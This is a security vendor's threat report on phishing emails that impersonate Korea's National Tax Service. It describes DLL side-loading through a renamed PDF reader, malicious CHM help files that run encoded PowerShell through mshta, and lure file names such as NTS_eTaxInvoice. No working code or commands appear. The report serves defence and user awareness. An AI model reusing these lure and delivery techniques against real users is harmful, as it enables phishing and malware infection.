Trend Report on Phishing Malware Impersonating the National Tax Service (NTS)
There is a noticeable increase in phishing emails impersonating the National Tax Service (NTS) whenever it is time to file value-added tax (VAT) and other taxes. AhnLab SEcurity intelligence Center (ASEC) has been alerting users to this threat by distributing relevant content.
Phishing cases impersonating the National Tax Service have been ongoing for several years, but the distribution trend identified by AhnLab has significantly increased in 2024. The key features of these cases include the threat actors manipulating the sender’s email address to make it appear as if it is from the National Tax Service, and creating and attaching malicious files in various formats.
Phishing emails impersonating the NTS can be classified into two major categories based on the method used to deliver malware: 1) using the email attachment feature, and 2) embedding a hyperlink in the email body to link to a website where the malware is hosted. Threat actors use a wide range of file formats when attaching files to their emails. The following table summarizes the types of eight file formats and the malicious behaviors that are ultimately executed for each format.
Figure. 1. Example of phishing email
| File Format | Final Malicious Behavior |
| HTML (Script file) | Leaks user account credentials to C2 server |
| VBS (Script file) | Operates as a downloader malware and often utilizes PowerShell commands (e.g. Guloader) |
| PPT (Document file) | Operates as a downloader malware (e.g. Lokibot, AgentTesla) |
| DLL (Executable file) | Performs malicious behavior using DLL hijacking technique alongside a legitimate file |
| SCR (Screen saver file) | Operates as a dropper (NSIS installer format) |
| EXE (Executable file) | Directly executes malicious codes of downloader/infostealer-type malware (e.g. GuLoader, Lokibot, Formbook, Remcos) |
| LNK (Shortcut file) | Disguises as a Hangul file with the .hwp extension and icon, and downloads additional malware |
| CHM (Windows Help File) | Executes additional scripts located at a specific URL through the MSHTA process |
Table 1. Summary of the malicious behaviors executed by each file format
Out of the 8 file formats, let’s take a look at DLL and CHM files.
- DLL (Executable File)
Cases of utilizing DLL files in attacks operate differently from other file extensions. Ultimately, the DLL file that performs malicious functions is distributed through a compressed file named ‘NTS_eTaxInvoice.zip’.
In the figure below, it can be seen that the ‘NTS_eTaxInvoice.exe’ file inside the compressed file is a legitimate file called ‘Haihaisoft PDF Reader’, and only the file name has been changed to a National Tax Service-related keyword. When this file is executed, the ‘msimg32.dll’ file that exists in the same folder operates through DLL hijacking to perform malicious behaviors.
Figure 2. Legitimate file (NTS_eTaxInvoice.exe) with a PDF icon and malicious DLL (msimg32.dll)
Currently, the Git repository for performing additional malicious behaviors cannot be connected to. However, the malware found in the Git repository has been identified as XWorm. XWorm is capable of not only monitoring the webcam and keyboard (keylogger) of the victim’s PC, but also stealing system information and user accounts.
As seen in the cases above, threat actors are attempting various methods instead of delivering a single executable file. Users are advised to take extra caution.
- CHM (Windows Help File)
A CHM file is a compiled HTML help file, and normal CHM files are mostly distributed with software packages. When a malicious CHM file is executed, the malicious script included within it is automatically activated through the Click method. The file names of the distributed files usually impersonate the National Tax Service, virtual electronic trading platform, or financial companies. Among them, in the case of an attack that impersonated the National Tax Service and disguised itself as a “tax invoice,” the file name used the actual name of the electronic tax invoice file like other cases with different extensions. The file name identified at the time was NTS_eTaxInvoice.chm.
Figure 3. Screen after executing the malicious CHM
When the CHM file is executed, a help window as shown in the figure above is created. Users are likely to mistake this for a normal process. Additionally, due to the file structure, the CHM file contains an HTML file with a malicious script inside. This script is executed by the MSHTA process to access a specific URL.
Figure 4. Part of the code that contains a malicious script inside the CHM file
In the above figure, the URL accessed by the mshta.exe process contains JS (JavaScript) code that executes an encoded PowerShell command. This ultimately leads to the execution of various functions, such as registering the Run registry for persistence and receiving commands from the threat actor’s C2 server and sending the results of the executed commands.
In addition to the aforementioned type, multiple other types of CHM malware using the same file name (NTS_eTaxInvoice.chm) have been identified. While the format remains the same with the presence of an HTML file containing a malicious script, these scripts are characterized by creating and executing BAT and VBS script files. This allows them to perform additional functions such as downloading other malware that steal user information, register in the Run registry, and ultimately perform malicious behaviors.
As seen in the cases above, threat actors are continuously exploiting topics that may interest users in their phishing attacks. In particular, during the tax payment period, users need to be extra cautious as they may receive legitimate emails from the National Tax Service.
